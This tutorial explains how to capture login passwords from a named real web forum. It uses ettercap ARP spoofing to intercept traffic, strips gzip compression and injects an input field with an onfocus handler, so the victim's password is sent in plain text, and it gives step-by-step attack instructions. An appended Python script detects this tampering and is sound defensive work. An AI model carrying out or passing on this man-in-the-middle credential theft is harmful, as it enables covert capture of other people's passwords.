It is assumed that you already have some knowledge of ettercap, as we are going to use ettercap for this tutorial. I did this mini tutorial because I wanted to play with ettercap filters. If you have ever sniffed for a username and password from the RE Forum, you would have noticed that the username is sent in clear text but the password is sent as an MD5 hash.

The MD5 hash is computed by JavaScript. If we look into the source code of the main forum page "http://forums.remote-exploit.org/index.php" we can notice that the MD5 JavaScript is located here: "http://forums.remote-exploit.org/clientscript/vbulletin_md5.js". Let's look at the first line of the login section of index.php. 'onsubmit' means that when we press the LOG IN button the 'md5hash' JavaScript function is executed. The value entered in the password field 'vb_login_password' is passed to the JavaScript, the MD5 hash is computed, and it is sent back to the FORM as 'vb_login_md5password' and 'vb_login_md5password_utf'.

How to "hack" this login method? Of course we can sniff the username and MD5 hash, and then the MD5 can be broken with a rainbow table. But I think there are a lot of other, better ways to get the password. I like Ettercap and its packet filters. That's why I 'hacked' the forum using my own Ettercap filter.

OK, the main idea is that the password must be forced to be sent to the web server in plain text. It's obvious that the user shouldn't notice that his/her network is being sniffed, so the login script must be modified in a way that still allows normal logging in to the forum. The simplest way to do this is to modify the login section of index.php. As we see below, there are input tags of type='hidden'. These fields are filled in by the md5hash JavaScript and then sent to the server. I think the best solution is just to add a new input field and copy the password string into it. To do this, the existing HTML code must be modified. Let's use ETTERCAP and its filters.

But first we should look at the HTTP traffic generated by the RE Forum during login. Start ETHEREAL. As we see, the HTML source code isn't sent in plain text! It is compressed by gzip (deflate). To disable this feature we have to remove the entry "Accept-Encoding:gzip,deflate" from the HTTP packets and replace it with something else (I've seen the ettercap and yahoo tutorial, that's why I know this ;-). Let's use one of the Ettercap filters to eliminate gzip compression. Now we can sniff the network and we notice that the forum page is sent without gzip compression! Pure HTML code! So let's modify something.

I suggest replacing a useless part of line 14 with something useful, like a new input tag ;-) I added ONFOCUS to the login button section because I wanted to assign "vb_login_password.value" to x.value of the new input tag, to send the x to the server in plain text: onfocus="x.value =vb_login_password.value" /> Now we have a new, useless parameter 'x' which is sent in plain text to the server, to 'login.php'. The server ignores it; however, we don't, because this is our desired password!

To start sniffing, the ettercap filter must be compiled:
1. Create a new empty file ForumFilter.filter.
2. Copy and paste the included ettercap filter into the file.
3. Compile it: 'etterfilter ForumFilter.filter -o ForumFilter'

Next, start ettercap:
1. Sniff -> Unified Sniffing
2. Host -> Scan for Hosts
3. Host -> Host List, and add the victim's machine to target 1 and the router etc. to target 2
4. MITM -> ARP Spoofing, Sniff Remote connections
5. Filter -> Load new filter, then open our ForumFilter
6. Start -> Start sniffing

Next, start ETHEREAL. The network is now being sniffed. If everything was done correctly, the username and password should appear in plain text in the sniffer.
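The modification described above leaves two signatures that a defender can look for: an Accept-Encoding header overwritten in place so that it no longer names a real content-coding, and a login form carrying an extra input plus an inline handler that reads the password field. The following is an added defender-side example, not part of the original tutorial or of vBulletin; the request and page samples are constructed, and the expected field set is the one named on this page.

```python
"""Defender-side checks for the two tampering signs described on this page:
an Accept-Encoding header overwritten to defeat compression, and a login form
that gained an extra input or an inline handler copying the password field."""
import re
from typing import List, Set

# Field names the page's vBulletin login form uses; extend with your own site's baseline.
EXPECTED_LOGIN_FIELDS: Set[str] = {
    "vb_login_username", "vb_login_password",
    "vb_login_md5password", "vb_login_md5password_utf",
}
# Registered HTTP content-codings; a header naming none of them is suspect.
KNOWN_CODINGS = {"gzip", "deflate", "identity", "compress", "br", "x-gzip", "*"}

INPUT_TAG = re.compile(r"<input\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r'(\w[\w-]*)\s*=\s*"([^"]*)"')

def check_accept_encoding(request_headers: str) -> List[str]:
    """Return findings for Accept-Encoding values that carry no known coding.
    An in-place rewrite by a MITM filter keeps the header length but breaks its tokens."""
    findings = []
    for line in request_headers.splitlines():
        if not line.lower().startswith("accept-encoding:"):
            continue
        value = line.split(":", 1)[1].strip()
        tokens = {t.split(";")[0].strip().lower() for t in value.split(",") if t.strip()}
        if not tokens or not tokens & KNOWN_CODINGS:
            findings.append(f"Accept-Encoding carries no known coding: {value!r}")
    return findings

def check_login_form(html: str, expected: Set[str] = EXPECTED_LOGIN_FIELDS) -> List[str]:
    """Return findings for unexpected inputs and for inline event handlers that read
    the password field, which is how an injected form copies it out in plain text."""
    findings = []
    for tag in INPUT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        name = attrs.get("name", "")
        if name and name not in expected:
            findings.append(f"unexpected input field {name!r}")
        for attr, val in attrs.items():
            if attr.startswith("on") and "vb_login_password" in val:
                findings.append(f"inline {attr} handler reads the password field: {val!r}")
    return findings

if __name__ == "__main__":
    # Constructed samples, not captures from the page; example.invalid is a placeholder host.
    req = "GET /index.php HTTP/1.1\r\nHost: example.invalid\r\nAccept-Encoding: xxxx,yyyyyyy\r\n"
    page = ('<form action="login.php" method="post">'
            '<input type="text" name="vb_login_username">'
            '<input type="password" name="vb_login_password">'
            '<input type="hidden" name="vb_login_md5password">'
            '<input type="hidden" name="x" value="">'
            '<input type="submit" value="Log in" onfocus="x.value=vb_login_password.value">'
            '</form>')
    for finding in check_accept_encoding(req) + check_login_form(page):
        print("ALERT:", finding)
```

Run against a proxy log or a saved page copy; a clean request and an unmodified login form produce no findings.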